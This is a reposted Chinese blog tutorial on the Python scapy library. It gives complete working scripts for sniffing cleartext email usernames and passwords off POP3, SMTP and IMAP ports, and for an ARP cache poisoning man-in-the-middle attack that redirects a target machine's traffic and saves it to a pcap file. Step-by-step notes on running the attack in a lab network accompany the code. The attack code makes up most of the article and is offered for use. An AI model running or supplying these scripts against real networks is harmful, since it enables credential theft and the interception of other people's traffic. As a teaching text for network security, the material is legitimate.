Python scapy网络包嗅探模块(转载)

最新推荐文章于 2023-09-18 15:35:56 发布
最新推荐文章于 2023-09-18 15:35:56 发布
阅读量1k 收藏 4
点赞数
文章标签: 网络 python
原文链接:https://yq.aliyun.com/articles/661238
版权

1.窃取Email认证
1.1创建一个简单的嗅探器,捕获一个数据包,packet.show()函数解析了其中的协议信息并输出了包的内容。

from scapy.all import *
def packet_callbacke(packet):
    print packet.show()

sniff(prn=packet_callbacke,count=1)

得到

python mail.py
WARNING: No route found for IPv6 destination :: (no default route?)
###[ Ethernet ]###
  dst       = c4:ca:d9:a8:cf:58
  src       = 60:eb:69:15:76:5f
  type      = 0x800
###[ IP ]###
     version   = 4L
     ihl       = 5L
     tos       = 0x0
     len       = 52
     id        = 6428
     flags     = DF
     frag      = 0L
     ttl       = 64
     proto     = tcp
     chksum    = 0xbacf
     src       = 10.21.21.120
     dst       = 115.239.211.92
     \options   \
###[ TCP ]###
        sport     = 33038
        dport     = http
        seq       = 2801454030
        ack       = 0
        dataofs   = 8L
        reserved  = 0L
        flags     = S
        window    = 8192
        chksum    = 0xf415
        urgptr    = 0
        options   = [('MSS', 1460), ('NOP', None), ('WScale', 2), ('NOP', 

None), ('NOP', None), ('SAckOK', '')]
None

1.2设置过滤器

from scapy.all import *

# 数据包回调函数
def packet_callback(packet):

    if packet[TCP].payload:

        mail_packet = str(packet[TCP].payload)

        if "user" in mail_packet.lower() or "pass" in mail_packet.lower():

            print "[*] Server: %s" % packet[IP].dst
            print "[*] %s" % packet[TCP].payload

# 开启嗅探器
sniff(filter="tcp port 110 or tcp port 25 or tcp port 143",prn=packet_callback,store=0)
img_5227f4826356f30bea5d50bc5de0f6a9.png
这里写图片描述

前两次没有接收到数据:没有开启邮件客户端,而是用的web客户端传输邮件,第三次修改了代码的接收端口,加入一个80 port,此时可以接收到web端的数据。

2.ARP 缓存投毒

#-*- coding:utf8 -*-

from scapy.all import *
import os
import sys
import threading
import signal

interface   = "eth0"    #要嗅探的网卡 (linux下arp -a可查看)
target_ip   = "10.21.21.120"      #目标ip,这里测试的是另外一台win主机
gateway_ip  = "10.21.21.1"        #网关ip,这里是目标的网关
packet_count = 1000

def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):

    # 以下代码调用send函数的方式稍有不同
    print "[*] Restoring target..."
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)

    # 发出退出信号到主线程
    os.kill(os.getpid(), signal.SIGINT)

def get_mac(ip_address):

    # srp函数(发送和接收数据包,发送指定ARP请求到指定IP地址,然后从返回的数据中获取目标ip的mac)
    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address), timeout=2, retry=10)
    # 返回从响应数据中获取的MAC地址
    for s,r in responses:
        return r[Ether].src
    return None

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):

    poison_target = ARP()
    poison_target.op = 2                # 01代表请求包,02代表应答包
    poison_target.psrc = gateway_ip     # 模拟网关发出
    poison_target.pdst = target_ip      # 目的地是目标机器
    poison_target.hwdst = target_mac    # 目标的物理地址是目标机器的mac

    poison_gateway = ARP()
    poison_gateway.op = 2               # 响应报文
    poison_gateway.psrc = target_ip     # 模拟目标机器发出
    poison_gateway.pdst = gateway_ip    # 目的地是网关
    poison_gateway.hwdst = gateway_mac  # 目标的物理地址是网关的mac

    print "[*] Beginning the ARP poison. [CTRL_C to stop]"

    while True:
        try:
            # 开始发送ARP欺骗包(投毒)
            send(poison_target)
            send(poison_gateway)
            # 停两秒
            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

    print "[*] ARP poison attack finished"
    return

# 设置嗅探的网卡
conf.iface = interface

# 关闭输出
conf.verb = 0

print "[*] Setting up %s" % interface

# 获取网关mac
gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting"
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)

# 获取目标(被攻击的机器)mac
target_mac = get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting"
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip, target_mac)

# 启动ARP投毒线程
poison_thread = threading.Thread(target = poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()

try:
    print "[*] Starting sniffer for %d packets" % packet_count

    bpf_filter = "ip host %s " % target_ip  # 过滤器
    packets = sniff(count = packet_count, filter=bpf_filter, iface = interface)

    # 将捕获到的数据包输出到文件
    wrpcap("arper.pcap", packets)
    # 还原网络配置
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

except KeyboardInterrupt:
    # 还原网络配置
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit(0)

主要函数poison_target()中的两部分

poison_target.psrc = gateway_ip     
poison_target.pdst = target_ip      
poison_target.hwdst = target_mac   mac

对目标机器而言

攻击机的mac是网关,就是攻击者的机器是网关
模拟是网关发出的, 其实是我们的机器发出的

poison_gateway.psrc = target_ip        
poison_gateway.pdst = gateway_ip    
poison_gateway.hwdst = gateway_mac
img_781ffbe2617635a1823a588456e2f605.png
这里写图片描述

(1) 先用scanner.py扫描一下存活的主机


img_a126a227494b18813d04d8f39a91d582.png
这里写图片描述

(2) 目标机器上arp -a查看 对应mac


img_e06fbb89a3023fcc85d310167bf8a7ca.png
这里写图片描述

(3) 攻击方 arp -a


img_53b43b7797e4e084013db8ef69762b1e.png
这里写图片描述

(4) 查看是否能ping通,目标机器存在有线和无线ip时无法ping通,关掉无线,使得攻击方和目标方同在一个子网内,ip不冲突即可ping 通


img_367aba5494f72c0a08e7ccc9549915f9.png
这里写图片描述
img_0df2e94bc813d0ce0d06fe1c76081294.png
这里写图片描述

(5) 开始攻击


img_39c74be6b9c8d58ba864dacef18dcb7b.png
这里写图片描述

(6) 攻击后查看对比目标机器的mac


img_bb5e5fa46bee33d9997e3ef49d5f70d9.png
这里写图片描述

看到目标机器的mac地址被改成了攻击方的mac
(目标机器不能上网了……忘记开启流量转发…….)


img_93dba46f1b3def4c1742b0e5f4201c89.png
这里写图片描述

(7) 打开默认路径下arper.pcap就能看到目标机器通信的信息
(8)再打开arp -a就是

汇总了………

weixin_33733810
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络scapy_python学习笔记
littleNerd的博客
12-24 318
网络scapy_python学习笔记
pythonscapy_python scapy网络
weixin_31062533的博客
12-29 917
1. 介绍scapy是一个可用于网络的非常强大的第三方库。在网络方面前面的博文介绍过通过Raw Socket进行网络,但是Raw Socket比较底层,使用起来可能不太容易而且在不同的系统上也有一定的区别。在网络流量方面,常用的一些第三方库:scapy接下来我详细介绍下scapy的使用,它在这些库中功能最强大使用也最灵活。具有以下几个特点:交互模式,用作第三方库。可以用来做pack...
[源码]python Scapy Ftp密码
weixin_30567225的博客
03-06 215
[源码]python Scapy Ftp密码 原理很简单,FTP密码明文传输的 截取tcp 21端口User和Pass数据即可 Scapy框架编译程序较大(一个空程序都25M),所以就不提供exe 1 # -*- coding: UTF-8 -*- 2 #author: k8gege 3 import os 4 import queue 5 from scapy....
scapy网络模块的使用
孤的博客
05-14 522
先查看常用命令 lsc()
基于QT5和scapypython网络
zilatan1998的博客
09-18 348
self.setWindowTitle("网络器")self.packet_count = 0 # 数据计数器self.pcap_packets = [] # 用于保存捕获的数据# 创建接口选择下拉菜单# 创建表格self.table_widget.setHorizontalHeaderLabels(["协议类型", "源地址", "目的地址", "长度"])# 创建详细信息文本编辑框# 创建按钮。
pythonscapy库,实现网卡收发的例子
01-20
采用scapy模块, 1-获取计算机网卡的iface,并预先设计好用哪些iface进行收发流; 2-conf.L2listen对各个iface进行监听 3-subprocess.Popen来调用tShark.exe启动抓,也可以调用ping.exe构造ping 4-sendp发送二层...
python scapy
11-15
scapy compatibility.py 177行出错。用这个可以解决。删除C:\Python27\Lib\site-packages\scapy目录下所有文件。解压zip中文件,运行命令 python setup.py install
Python基于scapy实现修改IP发送请求的方法示例
09-21
Python网络编程中,Scapy是一个强大的,用于创建、修改和发送几乎任何网络协议的数据。本示例主要展示了如何使用Scapy来修改IP地址并发送HTTP请求,这对于测试网络安全、模拟网络行为或者进行渗透测试非常有用...
Python+Scapy
02-27
PythonScapy库是一个强大的网络协议层数据处理工具,由Erik Hultman创建,主要用于网络数据分析、安全测试和网络设备调试。它允许开发者发送、接收、和解析几乎任何网络协议的数据,因此在网络安全、渗透...
Python-scapy基于python的交互式数据处理程序和库
08-10
4. **协议检测与**:Scapy可以进行网络,检测网络流量中的异常行为,例如端口扫描、中间人攻击等。这在网络安全审计和防御中非常有用。 5. **网络测试与故障诊断**:Scapy可用于执行ping、traceroute、...
简单网络
11-19
给予winpcap实现的简单的网络器,对协议进行分析,并利用snmp实现简单的网络拓扑功能
一个牛人总结的sniffer抓分析教程
04-11
一个牛人总结的160多页sniffer抓分析教程
Python网络编程之黏
PythonGo
08-21 9533
概念 在TCP中,发送方把若干数据发送,接收方收到数据时候黏在一,从接受缓冲区来看,后一的数据黏在前一的尾部的一种现象。 出现原因 发送端: TCP默认使用Nagle算法,主要做两件事: 上一分组得到确认,发送下一组; 收集多个小组,合组成一个分组,在确认信息来一起发送。 接收端: 收到分组暂放缓存区,程序主动接受缓存里面调出的分组; 当接收分组的速度大于应用读取分组时,...
python网络相关的和函数
Hesy_H的博客
11-24 2082
一些概念 文件描述符 可以是一个整数形式的文件描述符,比如 sys.stdin.fileno() 的返回结果,或为 io.IOBase 对象,比如 sys.stdin 提供一个 fileno(),可返回一个真正的文件描述符。 常用 socket 比较底层的API接口,该模块提供对 BSD套接字接口的访问。它适用于所有现代 Unix 系统、Windows、MacOS 以及可能的其他平台。 每一个socket name都是一个地址族(address family) ,常用的地址族就是AF_INET
Scapy Python仿真实验(GUI界面)--1.介绍+准备
谁月
01-14 1174
实验目的 利用scapy库实现对网卡数据和解析,的数据括_IP,TCP,UDP,ARP,ICMP,DNS,Http_(需用到scapy-http库) 环境准备 注:本系列实验建立在Python环境已经安装成功且已经配置环境变量的前提条件下!提前自行配置后继续往下看。 检验:打开电脑cmd窗口,输入“python”并回车,出现类似以下界面就代表python环境已配置好 软件和库的安...
python解析网络方法
weixin_34232363的博客
12-21 853
2019独角兽企业重金招聘Python工程师标准>>> ...
Python实现采用scapy编写网络程序
qq_43217550的博客
03-20 1090
(1) from scapy.all import * #进行捕捉5个,存在packet里面 packet = sniff(count=5) #将packet写入文件test.pcap中存储起来,wrpcap可以实现对捕获数据的保存 wrpcap(“E:\PycharmProjects\test.pcap”,packet) (2) #scapy采用rdpcap可以实现对数据文件的读取操作 from scapy.all import * #rdpcap实现对数据文件的读取 pcaps = rdpcap
pythonhttp请求_pythonScapy中的HTTP GET数据
weixin_32860759的博客
02-20 1601
我试图在Scapy中编写一个简单的器,它只使用GET方法打印HTTP数据.这是代码:#!/usr/bin/pythonfrom scapy.all import *def http_header(packet):http_packet=str(packet)if http_packet.find('GET'):print GET_print(packet)print packetdef GE...
pythonscapy模块下载
最新发布
04-27
Python中,Scapy是一个功能强大的网络数据处理库,它可以用于网络分析、、发送和接收网络数据等。要下载Scapy模块,你可以按照以下步骤进行操作: 1. 打开终端或命令提示符。 2. 确保你已经安装了Python...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值